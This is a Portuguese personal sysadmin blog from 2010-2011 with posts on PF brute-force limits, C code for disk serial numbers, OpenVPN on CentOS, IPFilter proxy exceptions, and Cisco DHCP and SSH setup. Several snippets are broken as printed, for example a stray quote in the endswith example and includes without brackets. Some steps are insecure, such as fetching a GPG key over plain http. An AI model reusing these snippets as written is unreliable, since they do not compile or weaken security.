Inseto Verde's Blog - Um lugar para Nerds

Se livrando dos ignorantes - DoS/DDoS

2011-06-28T11:31:00.003-03:00

( texto original de: The Book of PF )

First, set up the table by adding the following line to your tables section:

table ‹bruteforce› persist

Then, somewhere fairly early in your rule set, set up the rule to block traffic from the brute forcers, as shown here:
block quick from ‹bruteforce›

And finally, add your pass rule like this:

pass inet proto tcp from any to $localnet port $tcp_services \
keep state (max-src-conn 100, max-src-conn-rate 15/5, \
overload ‹bruteforce› flush global)

This is rather similar to what we’ve seen before, isn’t it? In fact, the first part is identical to the rule we constructed earlier. What you should pay close attention to is the part in parentheses, called state-tracking options. These will ease your network load even further. max-src-conn is the number of simultaneous connections you allow from one host. In this example, I’ve set it to 100. However, in your setup you may want a slightly higher or lower value, depending on the traffic patterns on your network.
max-src-conn-rate is the rate of new connections allowed from any single host, here 15 connections per 5 seconds. Again, you are the one to judge what suits your setup. overload  means that any host that exceeds these limits has its address added to the table . Our rule set blocks all traffic from addresses in the ‹bruteforce› table.

Retornando o Número de Série em C - Linux

2011-05-08T13:46:00.003-03:00

Leiam o post anterior.

#include stdio.h
#include fcntl.h
#include string.h
#include linux/hdreg.h

char* retornaID(char *drive){
struct hd_driveid hd;
int ide;
ide=open(drive,O_RDONLY);
ioctl (ide,HDIO_GET_IDENTITY,&hd);
char *did = (char *) malloc(strlen(hd.serial_no) + 1);
strncpy(did,hd.serial_no, sizeof(hd.serial_no));
return did;
}

int main()
{
char *drive = "/dev/hda";
printf("ID: %s\n", retornaID(drive));
}

forte abraço,

Retornando o Número de Série em C - Windows

2011-05-08T12:44:00.003-03:00

Boa,

Precisei pegar o número de série para uma rotina de segurança no sistema em Java que estou desenvolvendo. Mas, o Java não consegue fazer isso "ainda". A solução é criar um programa externo ao Java em uma linguagem CAPAZ de fazer isso (hehehehe - malvadeza), é aí que entra o master C.

Obrigado Assuero, obrigado Google... chegamos à solução:

#include iostream.h
#include stdio.h
#include windows.h

DWORD retornaID(char *drive){
BOOL fResult;
char *pszDriveName;

char szVolName[MAX_PATH];
char szFileSysName[80];
DWORD dwSerialNumber;
DWORD dwMaxComponentLen;
DWORD dwFileSysFlags;

pszDriveName = drive;

fResult = GetVolumeInformation(pszDriveName, szVolName, MAX_PATH,
&dwSerialNumber, &dwMaxComponentLen,
&dwFileSysFlags, szFileSysName, 80);

return dwSerialNumber;
}

int main (int argc, char **argv)
{
char *drive = "c:\\";
printf("ID: %#ld\n", retornaID(drive));
system("PAUSE");
}

Forte abraço,

JavaMail vários destinatários

2011-04-26T02:22:00.005-03:00

Boa madrugada,

Estou meio afastado do blog (mais uma vez) por motivos de trabalho. Estou muito envolvido no desenvolvimento de um sistema que está me roubando todo o tempo. Mas dei uma "passadinha" rápida aqui para mostrar a solução pra um problema que tive hoje: usar o javamail para enviar emails para mais de um destinatário.

Nem é tão difícil assim, mas acho que a falta de exemplos na Internet faz com que pareça ser.

Vamos lá então:

Quando vamos criar a mensagem a ser enviada, precisamos passar as seguintes informações básicas:

Assunto
Conteúdo da mensagem
Remetente
Destinatário(s)

É algo mais ou menos assim:

MimeMessage message = new MimeMessage(mailSession);

message.setSubject(email.getAssunto());

message.setContent(email.getMensagem(), "text/plain");

message.setFrom(new InternetAddress(email.getRemetente()));

message.addRecipients(Message.RecipientType.TO, "DESTINATÁRIOS"));

Bem, nesta ultima linha é onde definimos o(s) destinatário(s). E é esta última linha que este post tem como foco.

A função addRecipients tem dois construtores:

Recebe o tipo de endereço que está sendo adicionado e um Array do tipo Address
Recebe o tipo de endereço que está sendo adicionado e uma String com o(s) endereço(s)

Ou seja, ou você passa pra a função addRecipients um Array do tipo Address (contendo a lista de endereços), ou uma String (também contendo a lista de endereços). Eu particularmente achei muito mais fácil a segunda opção.

OBS.: O tipo do endereço refere-se a se é um "destinatário primário", um destinatário do tipo "com cópia" ou "com cópia oculta".

Para passar uma lista de emails por meio de uma String, eu só preciso separar os emails por vírgula. A minha String deve ser algo parecido com o seguinte:

String lista="em1@technaweb.com.br, em2@technaweb.com.br";

E a minha última linha do exemplo citado acima ficaria assim:

message.addRecipients(Message.RecipientType.TO, lista);

Assim, quando a função para enviar o email for chamado (função sendMessage da classe Transport), a lista de emails será verificada e um email será enviado para cada um dos endereços na String lista.

Curso Metasploit

2011-04-09T21:49:00.000-03:00

Curso gratuito do metaspoloit:

http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training

Forte abraço,

Wallpaper

2011-04-09T21:29:00.002-03:00

Se você gostou do plano de fundo do blog, é possível ter ele como papel de parede em seu computador:

http://www.vivaolinux.com.br/wallpapers/download.php?codigo=10361&file=JessicaBSD.jpg

Forte abraço,

Laboratório - Port knocking no NetBSD

2011-03-14T11:23:00.003-03:00

Fala aê galerinha boa,

Estou em pleno trânsito aqui em Aracajú -SE, mas tenho prazer de compartilhar esses vídeos com vocês. Aí está o laboratório referente ao vídeo anterior (explicando o PK).

PARTE 1:

PARTE 2:

Forte abraço,

Port Knocking

2011-03-09T20:08:00.003-03:00

Fala galerinha boa,

Nesse video mostro de maneira bem simples como funciona o port knocking e mostro o ambiente que usarei num outro vídeo para mostrar na prática como ele funciona.

Forte abraço,

IPF - Inserir regras via linha de comando

2011-03-03T04:12:00.008-03:00

Fala galerinha boa,

Estava aqui dando uma revisada no IPF (IP Filter - Filtro de pacotes padrão do NetBSD), e me deparei com uma coisa incômoda. O IPF não tem um comando para adicionar regras numa lista existente. Para fazer isso, por padrão, nós precisamos usar o comando echo para enviar a nova regra para o comando ipf com a opção -f -. Isso ficaria mais ou menos assim:

interface# echo 'block in quick all' | ipf -f -

Para cada regra que quisermos adicionar, precisaremos fazer isso. Que chato, usar o comando echo para adicionar regras à lista do IPF... Então fui fazer um script pra resolver essa situação. São coisas bestas que acho que já deveriam estar implementadas para facilitar a vida dos administradores. Mas em fim, olha aí como é complexo o script:

interface# cat ipfadd
echo $* | ipf -f -

Criei um arquivo chamado ipfadd e inseri APENAS uma linha nele. Esta linha pega os argumentos passados para o script e envia para o ipf -f - (como precisariamos fazer na mão grande).

Não podemos esquecer de dar permissão de execução para o script:

interface# chmod +x ipfadd
interface# ls -l ipfadd
-rwxr-xr-x 1 root wheel 19 Mar 3 01:11 ipfadd

Agora para usar ele sem incômodos copiamos para a pasta /sbin:

interface# cp ipfadd /sbin

Pronto. Agora adicionar regras à lista do IPF ficou mais fácil. Podemos fazer assim:

interface# ipfadd pass in all
interface# ipfadd pass out all

Agora para verificarmos a lista de regras, basta usar o comando ipfstat -io (as opções -io significam: i, para incomming, e o para outcomming):

interface# ipfstat -io
pass out all
pass in all

Veja que as regras que inserimos com o nosso novo script foram adcionadas com sucesso à lista. É claro que esse script pode ser melhorado, sempre existe campo para melhora. Mas o objetivo foi apenas encontrar uma solução bem rápida e simples para o desconforto apresentado.

Forte abraço,

NetBSD - Descobrindo o dono de um socket

2011-02-24T06:16:00.003-03:00

Fala galerinha boa,

Estava navegando net a dentro quando encontrei uma informação interessante que quero deixar guardado aqui para futuro uso. Muita gente ja teve o interesse em descobrir qual usuário iniciou um socket específico (socket = serviço ouvindo em uma porta da rede). Então segue o exemplo:

DESCOBRINDO O PCB DO SOCKET

interface# netstat -Aa
Active Internet connections (including servers)
PCB Proto Recv-Q Send-Q Local Address Foreign Address State
c20e99c4 tcp 0 52 192.168.56.1.ssh 192.168.56.1.50123 ESTABLISHED
c20e9bb8 tcp 0 0 *.ssh *.* LISTEN
0 udp 0 0 *.bootpc *.*

Usando a opção -A nós podemos descobrir o PCB (Protocol Control Block) , essas letras e númeors antes do protocolo, do socket em questão. O PCB é único para cada socket, e com ele podemos pegar a informação que nos interessa no momento:

USANDO O PCB PARA DESCOBRIR O DONO DO SOCKET

interface# fstat | grep c20e99c4
root sshd 613 5* internet stream tcp c20e99c4 192.168.56.101:22 <-> 192.168.56.1:50123

O comando fstat é usado para exibir informações de um arquivo aberto. Como no NetBSD podemos caracterizar a grande maioria das coisas como arquivo, com o socket não é diferente. Usamos o fstat e fazemos um filtro com o PCB referente ao socket que nos interessa.

Assim na primeira linha temos a informação de quem iniciou o serviço que está ouvindo na porta da rede.

Um forte abraço,

C String endswith

2011-02-21T07:04:00.006-03:00

Estou aqui mais uam vez,

Então, estou umplementando o mesmo programinha que fiz em batch (hunter.bat), agora em C no NetBSD (é um passa tempo mesmo). Me deparei com uma situação onde precisei comparar a parte final de duas strings. Percebi que no C não temos a função endswith(3) por isso desenvolvi uma.

Essa função recebe duas strings e as compara. Caso sejam iguais ela retorna 1, caso contrário ela retorna 0.

Você pode baixar o arquivo de cabeçalho (strext.h) no seguinte link:
http://www.4shared.com/file/v7P_VNr0/strext.html

Segue um exemplo de como usar este cabeçalho:

/* Estou incluindo o caminho completo para o cabeçalho stdio.h por que o blog não aceita
que eu coloque os simbolos de "maior que" e "menor que".
*/
#include "/usr/include/stdio.h"
#include "strext.h" //AQUI ESTOU CHAMANDO O CABEÇALHO

int main(int argc, char *argv[]){
char *nome = argv[1];
char *ext = "argv[2];

if(endswith(nome, ext) == 1){
printf("Sao iguais.\n");
} else {
printf("Sao diferentes.\n");
}
}

Observe a saída do programa acima, usando o cabeçalho, aqui no meu computador:

BSDevel# ./stringext Alan ana
Sao diferentes.
BSDevel# ./stringext Alan an
Sao iguais.

É isso aí pessoal. Talvez você encontre uma outra solução. Se isso acontecer, coloque ela aqui como comentário, vamos aumentar em conhecimento. Eu estou estudando C, estou em fase de aprendizado, então não tome essa solução como absoluta. Esta foi apenas a maneira que eu achei de solucionar o meu problema.

Forte abraço,

HUNTER - Varrendo e Organizando arquivos

2011-02-19T23:00:00.009-03:00

Fala galerinha boa!

Hoje parei pra fazer um programinha besta em Batch (.bat) para me ajudar com uma tarefa chata aqui no meu computador. Vou compartilhar com vocês essa viagem. E... toma-lhe código:

-------------- Hunter.bat --------------
@echo off
SET PASTA="%temp%\hunter"

IF /I "%~2"=="h" (
GOTO AJUDA
) ELSE IF /I "%~1"=="h" (
GOTO AJUDA
) ELSE IF "%~1"=="" (
GOTO AJUDA
)

IF EXIST %PASTA% (
rd %PASTA%
)

mkdir %PASTA%

type NUL > saida.txt

for /R %1 %%i in (%~2) DO (
echo %%i >> saida.txt
)

for /F "usebackq delims==" %%i IN (saida.txt) DO (
IF EXIST %"PASTA%\%%~ni%%~xi" (
move "%%i" "%PASTA%\b%%~ni%%~xi"
) ELSE (
move "%%i" "%PASTA%\" )
)

move %PASTA% .
GOTO FIM

:AJUDA
Echo ----------------------------------------------------
Echo USO: %0 [LOCAL] ["*.txt *.pdf *.zip"]
Echo Faz-se necessario o uso das aspas ("")
Echo ----------------------------------------------------
GOTO FIM

:FIM
Echo --------------------------------------------
Echo Hunter - Por ALan MeC Lacerda
Echo 19/02/2011 Toda diversao reservada
Echo --------------------------------------------
cmd /c exit

------------------------- FIM --------------------------

O objetivo desse brinquedo é varrer os subdiretórios a partir de onde você indicar à procura de arquivos com a(s) extensão(ões) que você indicar. Daí ele cria na pasta corrente uma outra pasta contendo os arquivos que ele encontrou.

Outra caracteristica interessante é que se ao mover o arquivo para a pasta de destino, já existir um arquivo com o mesmo nome, o programa irá renomear o arquivo atual para "b"+nomedoarquivo.

CUIDADO
O programinha foi escrito para MOVER os arquivos que ele encontrar e não copiar, por isso os arquivos sairão do local de origem. Observe antes se é isso o que você realmente quer fazer. Se não for, altere o programa para fazer a cópia dos arquivos ao invés de movê-los.

Fiz UpLoad do arquivo na web. Se quiser baixá-lo, segue o link: http://www.4shared.com/file/HmgXd_DP/hunter.html

Forte abraços,

SSH no NetBSD

2011-02-03T16:34:00.005-03:00

Está aí mais um vídeo... Neste eu apresento como configurar o serviço SSH no NetBSD. É um detalhe mínimo que faz muitas pessoas bater cabeça (assim como bati quando comecei com o NetBSD).

Tirem proveito, e qualquer dúvida posta aí...

Forte abraço!

OpenVPN no CentOS

2011-02-01T17:47:00.005-03:00

Oba oba!!! \0/

Estou de volta para guardar mais uma informação útil! A instalação do OpenVPN no CentOS. Vou mostrar aqui de maneira bem direta a instalação e configuração que já realizei em diversos ambientes.

STARTING...

1. Instale o repositório RPMForge:

wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.1-1.el5.rf.i386.rpm

rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt

rpm -K rpmforge-release-0.5.1-1.el5.rf.*.rpm

rpm -i rpmforge-release-0.5.1-1.el5.rf.*.rpm

2. Verifique se o RPMForge aparece na lista de repositórios:

yum check-update

3. Instale o OpenVPN

yum install openvpn -y

4. Iniciando a configuração:

cp -pra /usr/share/openvpn/2.0/easy-rsa /etc/openvpn

cd /etc/openvpn/easy-rsa

. ./vars

./clean-all

./build-ca

5. Criando a chave para o servidor:

./build-key-server server

6. Criando a chave para o cliente:

./build-key cliente

7. Gerando um Diff Hellman (DH) no servidor:

./build-dh

dentro do diretório /etc/openvpn/ encontra-se um arquivo chamado server.conf (se não existir crie ele). Nesse arquivo criamos a seguinte configuração:

8. Exemplo de configuração do servidor:

######################################

# CONFIGURAÇÃO DA VPN BÁSICA INICIAL #

# 13/07/2010 - ALAN MEC LACERDA #

######################################

proto tcp-server

port 1194

dev tap

mode server

tls-server

# Configuração dos certificados

ca easy-rsa/2.0/keys/ca.crt

cert easy-rsa/2.0/keys/server.crt

key easy-rsa/2.0/keys/server.key

dh easy-rsa/2.0/keys/dh1024.pem

# Configuração para prender/amarrar um IP a um determinado cliente

client-config-dir /etc/openvpn/ccd

# usando compressão para otimizar o link

comp-lzo

status openvpn-status.log

server 10.2.2.0 255.255.255.0

# guardar a lista de IPs designados num arquivo de log

ifconfig-pool-persist ippool.log

Aqui termina o arquivo de configuração do servidor. Conforme foi definido na configuração do mesmo, nós estamos usando uma configuração para prender/amarrar um IP específico para o cliente da VPN (isso se dá por que o IP é designado dinâmicamente aos clientes da VPN). Assim, temos de criar o arquivo que amarra o IP ao cliente:

###################################################

# Exemplo de um arquivo dentro do diretório ccd: #

###################################################

# OBSERVAÇÃO: O arquivo DEVE ter o nome do cliente
# (cliente esse que é gerado no arquivo de chave criptográfica:veja passo 6)

# Apenas é necessário a definição do IP classe /30 que

# será designado ao cliente na outra ponta.

ifconfig-push 10.2.2.2 255.255.255.252

O que segue agora é o arquivo que vai ser enviado para o cliente a fim de poder se conectar na VPN do servidor.

9. Exemplo de configuração do cliente:

######################################

# CONFIGURAÇÃO DA VPN BÁSICA INICIAL #

# 13/07/2010 - ALAN MEC LACERDA #

######################################

#Configurações iniciais

client

dev tap

proto tcp-client

#Servidor da VPN e porta a conectar

192.1.1.1 1194

#Otimizando o túnel

persist-key

persist-tun

comp-lzo

resolv-retry infinite

nobind

# Configurações do certificado digital

remote-cert-tls server

tls-client

# Esses arquivos devem ser copiados do servidor para a máquina do cliente

# Observem o caminho para os arquivos e configure corretamente.

ca c:\\tech\\keys\\ca.crt

cert c:\\tech\\keys\\Cliente.crt

key c:\\tech\\keys\\Cliente.key

# Verbose

verb 3

Aqui finaliza a configuração do arquivo do cliente.

FINISHING...

Bem, em termos bem simples, é isso aí a configuração básica para uma VPN usado o tão famoso OpenVPN. Lembre que no cliente será necessário instalar também o software do OpenVPN a fim de se conectar ao servidor.

Espero ter sido se ajuda, e se tiver alguma dúvida pode se sentir a vontade para perguntar.

Forte abraço,

Tomcat ouvindo em um endereço IP específico

2011-01-24T11:04:00.002-03:00

Boa pessoal,

Demoro mas apareço. Desta vez venho guardar aqui mais uma informação que pode ser de
meu interesse futuro e que também pode ajudar vocês.

Para definir o endereço IP onde no qual o tomcat deve ouvir, nós vamos até a pasta onde
o tomcat está e entramos no diretório "conf", daí editamos o arquivo server.xml e adicionamos a parte em negito:

Connector port="8080" protocol="HTTP/1.1" address="10.2.2.1"
connectionTimeout="20000"
redirectPort="8443"

Observou onde foi colocado? Na linha que define a porta 8080 (padrão do Tomcat) lá, definimos qual endereço IP queremos que seja usado!

Forte abraço,

IPFilter vs Conectividade Social

2010-07-16T09:34:00.003-03:00

Este é um breve artigo que escrevi há alguns anos. Futucando aqui encontrei ele, e quero compartilhar com vocês:

Proxy Transparente + Conectividade Social + IPFilter no NetBSD

A Conectividade Social é um aplicativo que fornece serviços geralmente utilizados pelo setor pessoal de uma empresa para entrega do SEFIP, pedir extratos do FGTS, guia do INSS e coisas do tipo. Resumindo: O setor pessoal NECESSITA da conectividade.

O acesso à Internet coloca ao alcance dos usuários de uma empresa informações ou conteúdos que geralmente são inconvenientes para a empresa (sites pornográficos, download de música, livros piratas e afins). Para evitar isso se usa Proxys que são sistemas capazes de bloquear acesso a conteúdos indesejados pela política ou necessidade da empresa. Resumindo: A empresa NECESSITA de um PROXY.

A Conectividade Social (CS) não se comporta muito bem quando passa por um Proxy. Isso se dá por que o fluxo de comunicação da CS acontece via porta 80 (HTTP), mas o seu conteúdo é criptografado (HTTPS). É! eles fugiram do padrão, e quando isso é feito, o que acontece? Isso mesmo: PROBLEMAS, INCOMPATIBILIDADE. E sobra sempre pra nós, administradores que independente de quem errou, temos que fazer a coisa funcionar.

Se você usa o IPTables, bem provável achará a solução para esse problema num piscar de olhos. Mas se precisa resolver esse problema usando IPFilter, acredito que esse é o primeiro, e até agora o único lugar que você poderá encontrar a informação que procura. No IPFilter é um pouco mais complicado por causa da estrutura que o NAT e o Firewall é organizada e a ordem de fluxo do pacote: http://coombs.anu.edu.au/~avalon/ipfil-flow.html ou seja, uma regra de firewall, diferentemente do IPTables, não resolveria o nosso problema. Temos de resolver isso na regra de NAT mesmo.

Em fim vamos à solução:

O Proxy Transparente funciona com a idéia básica de que todo pacote que for sair pra a Internet, deve ser redirecionado para a porta do Proxy antes, a fim de que o conteúdo seja inspecionado e, a depender da regra contida no Proxy, o trêfego será liberado ou não. No IPFilter a regra de redirecionamento desses pacotes é algo mais ou menos assim:

rdr rtk0 from any to any port = 80 -> 127.0.0.1 port 3128

rtk0 seria a interface da rede interna, 127.0.0.1 funcionaria nesse caso pois o Proxy está instalado na mesma máquina onde está o Firewall (caso fosse em máquina diferente, bastaria colocar o respectivo endereço), a porta 3128 é a porta padrão que o Squid Proxy escuta.

Já que a CS não pode passar pelo nosso filtro teremos que desviar o fluxo toda vez que o destino for caixa econômica federal (generalizei, poderia ser apenas pra o IP da CS), para evitar que ele passe pelo Proxy. Para isso teríamos que fazer um redirecionamento condicional, mas como não encontrei um modo de fazer isso, dei um jeito fazendo redirecionamento direto para o destino.

Para isso eu precisei coletar os endereços IP que estavam relacionados à conexão com a caixa até o fim da transação entre o setor pessoal e a CS. Foi um trabalho chato e meio vergonhoso usando o tcpdump, o grep, o resolvip e uma funcionária do setor pessoal (obrigado pela paciência Claudia). Mas os IPs resultantes desse trabalho fora:

200.201.173.68, 200.201.166.200, 200.201.166.240, 200.201.162.21 e 200.201.174.207

Sendo assim, agora precisamos apenas garantir que, toda vez que a comunicação for ser feita com um desses endereços, o fluxo passe direto, sem que o Proxy nem ao menos sinta o cheiro desses pacotes. Ou seja, um redirecionamento direto para o destino. De forma lógica eu concluí que deveria ser posta antes da regra de redirecionamento geral para a porta 3128, uma outra regra, que seria mais restritiva, assim:

rdr rtk0 from 0/0 to 200.201.173.68/32 port = 80 -> 200.201.173.68 port 80

rdr rtk0 from 0/0 to 0/0 port = 80 -> 127.0.0.1 port 3128

Assim tudo seria enviado para a porta 3128 de meu squid, EXCETO o que fosse para o endereço 200.201.173.68, por que quando o pacote chegasse na interface (rtk0) e o firewall fosse checar a regra de NAT pra ele, a primeira regra (que por padrão será aceita) é: MANDE ISSO PRA O DESTINO. Logo o pacote não passa pelo Proxy. SIMPLES! Todos os outros pacotes não iriam casar com a primeira regra, logo iriam passar pelo Proxy. Então o meu arquivo de NAT completo ficou assim:

firewall@~#cat /etc/ipnat.rules

map rtk1 192.168.0.0/24 -> 0.0.0.0/32 portmap tcp/udp 40000:60000

map rtk1 192.168.0.0/24 -> 0.0.0.0/32

################################################################

# SQUID #

################################################################

rdr rtk0 from 0/0 to 200.201.173.68/32 port = 80 -> 200.201.173.68 port 80

rdr rtk0 from 0/0 to 200.201.166.200/32 port = 80 -> 200.201.166.200 port 80

rdr rtk0 from 0/0 to 200.201.166.240/32 port = 80 -> 200.201.166.240 port 80

rdr rtk0 from 0/0 to 200.201.162.21/32 port = 80 -> 200.201.162.21 port 80

rdr rtk0 from 0/0 to 200.201.174.207/32 port = 80 -> 200.201.174.207 port 80

rdr rtk0 0/0 port 80 -> 127.0.0.1 port 3128

Feito isso, basta recarregar o ipnat e tudo estará lindo: /etc/rc.d/ipnat forcerestart. Agoravocê pode continuar a bloquear acesso a conteúdo impróprio, e o setor pessoal continuará funcionando!

Espero ter sido claro na explicação e ter te ajudado. Caso haja alguma dúvida ou correção, estou à inteira disposição para ajudar: alancordeiro@gmail.com. Agradeço a todos que colaboraram e tentaram me ajudar na época (Alan Jumpi). Fica aí minha parcela de contribuição.

Of course it runs NetBSD 

Alan MeC Lacerda,

:wq!

Fast How: DHCP on Cisco

2010-05-15T09:50:00.007-03:00

Pessoal,

Decidi fazer um "FAST HOW" nunca ouvi/vi esse termo antes, mas me refiro a um breve (bem breve mesmo) post sobre como fazer algo. Então lá vai:

CONFIGURANDO UM SERVIDOR DHCP NO IOS - CISCO

Série de comandos:

router>enable
router#configure terminal
router(config)#ip dhcp excluded-address 192.168.0.1 192.168.0.2
router(config)#ip dhcp pool labCCNA
router(dhcp-config)#network 192.168.0.0 255.255.255.0
router(dhcp-config)#default-router 192.168.0.1
router(dhcp-config)#dns-server 192.168.0.2
router(dhcp-config)#domain-name labccna.com
router(dhcp-config)#exit
router(config)#interface fast 0/0
router(config-if)#ip address 192.168.0.1 255.255.255.0
router(config-if)#no shutdown
router(config-if)# exit
router(config)#do wr

Explicando os comandos:

enable:
Acessa o modo privilegiado do IOS. Esté é apenas o caminho para poder acessar o modo de configuração global que é onde, de fato, inicia-se a configuração do servidor DHCP.

configure terminal:
Acessa o modo de configuração global para iniciar a configuração fo servidor DHCP.

ip dhcp excluded-address:
Define os endereços IPs que não podem ser atribuídos às máquinas clientes. Isso geralmente é usado para retirar da lista de IPs do DHCP os IPs dos servidores (gateway, dns, dados etc).

ip dhcp pool labCCNA:
Este comando cria um grupo de IPs e dá a esse grupo o nome "labCCNA" poderia ser qualquer nome desejado pelo administrador. No grupo é que se configura a faixa de IP que vai ser designada, o gateway que será designado dentre outras opções do DHCP.

network:
este comando define a faixa de rede que será designada às estações clientes do DHCP. Lembre-se que mesmo que a faixa exluida esteja dentro da rede que você definir aqui, ela não será atribuida a nenhuma estação, afinal de contas, você mandou excluílos.

default-router:
Este comando define qual o gateway padrão será designado para as estações clientes.

dns-server:
Este comando define qual o servidor DNS deve ser usado pelas estações clientes.

domain-name:
Este comando define qual o dominio local, ou qual o dominio base para as pesquisas DNS.

exit:
Volta um nível. Nesse caso, saindo da configuração do pool e voltando para o modo de configuração global.

interface fast 0/0:
Acessa a interface FastEthernet 0/0 do roteador para configurá-lo com o ip da rede local.

ip address:
Define um endereço IP para a interface fastethernet 0/0 do roteador.

no shutdown:
Coloca a interface no modo operacional.

exit:
Volta um nível. Nesse caso, saindo da configuração de interface e voltando para o modo de configuração global.

do wr:
Salva as configurações para caso o roteador reinicie, não perder as configurações feitas.

FINAL
É isso pessoal, qualquer dúvida podem postar aí que eu respondo. Forte abraço.

Pesquisa Ecológica

2010-03-22T19:06:00.003-03:00

O eco4Planet é um site de buscas que usa o mecanismo da grande Google ( MAS NÃO É AFILIADA À GOOGLE ), esse povo planta árvores de acordo com os acessos feitos tanto ao sistema de busca como ao blog deles.

Vale apena conferir o blog. É super-interessante: http://blog.eco4planet.com/. Ainda é possível adicionar o eco4planet à barra de busca no firefox.

Morte ao TELNET

2010-03-20T23:16:00.002-03:00

Quem de nós tem coragem de levantar um servidor Linux na Internet e configurar o TELNET para acesso remoto? Quem se dispõe levante o mouse... Não vejo ninguém. É, eu também não sou louco. Mas me pergunto: Se não temos coragem de fazer isso com o servidor de Rede, por que a grande maioria dos administradores não se preocupam em deixar os roteadores e switchs com o TELNET habilitado?

Pobres mortais do planeta TELNET... Vamos então boicotar o TELNET, ele tem que sair de circulação ou pelo menos entrar em desuso (o máximo de utilidade que o servidor Telnet pode ter é em laboratório - e olhe lá!). Vamos então ver como configurar o roteador para aceitar apenas conexões via SSH (Agora estamos falando em segurança/coisa de gente grande).

Primeiro passo de todos é configurar o hostname e domain-name para o nosso roteador:

Router>enable
Router#configure terminal
Router(config)#hostname R1
R1(config)#ip domain-name technaweb.com.br

Que bela sequência de comandos! Os primeiro e segundo comandos são para nos levar até o modo de configuração global do roteador. O terceiro é para definir o nome do roteador (hostname) e o ultimo é usado para definir o nome do domínio que o roteador pertence (no meu caso: technaweb.com.br, o seu será diferente). Feito isso podemos entrar na configuração do SSH em sí. Vamos gerar a chave RSA (levando em conta que o RSA de 1024 já foi quebrada, vamos configurar uma de 2048 bits):

R1(config)#crypto key generate rsa

Após digitar o comando acima, a seguinte mensagem será exibida:

The name for the keys will be: R1.technaweb.com.br
Choose the size of the key modulus in the range of 360 to 2048 for your
General Purpose Keys. Choosing a key modulus greater than 512 may take
a few minutes.

How many bits in the modulus [512]:

É a hora de definir quantos bits usaremos. Digite 2048 e presione enter e... a chave será gerada! Feito isso vamos criar o usuário e senha que irá logar:

R1(config)#aaa new-model
R1(config)#username alan password CCIESec

Habilitei o AAA (esse é um assunto vaaastoooo, vamos falar sobre isso no futuro mas sugiro que como um verdadeiro nerd você vá pesquisar o quanto antes) para o roteador gerenciar a autenticação - isso é realemente necessário, e criei um usuário chamado "alan" e senha de acesso "CCIESec". Só nos resta agora habilitar os terminair virtuais (VTYs) para usarem o tal do SSH:

R1(config)#line vty 0 15
R1(config-line)#transport input ssh
R1(config-line)#exit

A quantidade de terminais pode variar de um roteador para outro. Eu mostrei 16 terminais (de 0 a 15) mas nesse roteador que estou usando tenho 872 terminais. Na primeira linha, entramos no range de terminais que pretendemos habilitar com o SSH, e na segunda linha de comando efetuamos a configuração propriamente dita, definindo que a comunicação nesses terminais serão via SSH.

Que perfeito hein?! É hora de testar. Caso esteja usando um outro roteador para testar use o seguinte comando (a configuração de IP já está feita e o IP do nosso servidor SSH é 192.168.0.2):

R2#ssh -l alan 192.168.0.2

Password:

R1>

Bem simples e... e... e simples mesmo. Não sei por que ainda usa-se TELNET. Na verdade eu sei: por causa da preguiça!

Histórico de comandos no IOS

2010-03-20T01:51:00.007-03:00

Estou de volta com mais uma informação concernente ao que estou estudando no momento. Bem, como alguns já sabem eu decidi seguir a carreira de segurança da Cisco System, assim terei de revisar alguns assuntos do curriculo CCNA para poder continuar a carreira. Apenas a nível de informação, a carreira de segurança da Cisco é a seguinte:

CCNA -> CCNA Security -> CCSP -> CCIE Security

Pois bem, é essa a carreira que vou seguir. Mas vamos ao que importa: O conteúdo do post em sí!
Como todo sistema operacional moderno, o IOS (Internetwork Operating System), um dos sistemas operacionais da Cisco, possui a implementação do histórico dos ultimos comandos digitaos. Após digitar alguns comandos na CLI (Command Line Interface - basicamente a linha de comando), você pode usar a seta para cima, ou o CTRL + P, para exibir os comandos anteriormente digitados e usar a seta para baixo, ou CTRL + N, para exibir os comandos mais recente em comparação ao comando em exibição no terminal.

Pergunta interessante: "Quantos comandos o terminal memoriza por padrão?" Com o comando show terminal é possível responder a esta pergunta. Vejam a saída:

Router#show terminal
Line 0, Location: "", Type: ""
Length: 24 lines, Width: 80 columns
Status: PSI Enabled, Ready, Active, Automore On
Capabilities: none
Modem state: Ready
Special Chars: Escape Hold Stop Start Disconnect Activation
^^x none - - none
Timeouts: Idle EXEC Idle Session Modem Answer Session Dispatch
00:10:00 never none not set
Idle Session Disconnect Warning
never
Login-sequence User Response
00:00:30
Autoselect Initial Wait
not set
Modem type is unknown.
Session limit is not set.
Time since activation: 00:13:38
Editing is enabled.
History is enabled, history size is 20.
DNS resolution in show commands is enabled
Full user help is disabled
Allowed input transports are none.
Allowed output transports are pad v120 telnet.
Preferred transport is telnet.
No output characters are padded
No special data dispatching characters

Observem a linha em negrito: History is enabled, history size is 20. Esta linha indica o número 20 como sendo o tamanho da memória para comandos. Para alterar o tamanho do histórico, vamos usar o comando terminal history size:

Router#terminal history size 100

Agora vamos usar o comando para exibir as configurações do terminal e checar qual o tamanho do history agora (pressione duas vezes a seta para cima):

Router#show terminal
Line 0, Location: "", Type: ""
Length: 24 lines, Width: 80 columns
Status: PSI Enabled, Ready, Active, Automore On
Capabilities: none
Modem state: Ready
Special Chars: Escape Hold Stop Start Disconnect Activation
^^x none - - none
Timeouts: Idle EXEC Idle Session Modem Answer Session Dispatch
00:10:00 never none not set
Idle Session Disconnect Warning
never
Login-sequence User Response
00:00:30
Autoselect Initial Wait
not set
Modem type is unknown.
Session limit is not set.
Time since activation: 00:17:18
Editing is enabled.
History is enabled, history size is 100.
DNS resolution in show commands is enabled
Full user help is disabled
Allowed input transports are none.
Allowed output transports are pad v120 telnet.
Preferred transport is telnet.
No output characters are padded
No special data dispatching characters

Mais uma vez note a linha em negrito: History is enabled, history size is 100. Desta vez vemos que o tamanho do histórico é de 100;

Bem simples mas espero ter adicionado 2 Cents de conhecimento à imensidão de conheimento que você com certeza já possui.

Forte abraço,

Criando Canais Ethernet em Switchs CISCO

2010-03-08T21:24:00.006-03:00

Fala pessoal,

Por incrível que pareça eu estava há um tempão pensando em o que escrever aqui. Bem, decidi! :) Vamos ver como criar canais Ethernet(Etherchannel) em switchs cisco.

Vamos começar entendendo o que é um canal Ethernet e pra que serve. A palavra da vez quando vamos desenhar uma estrutura de rede ( ao se imaginar uma rede de médio a grande porte ) é redundância! Algo parecido com o desenho abaixo:

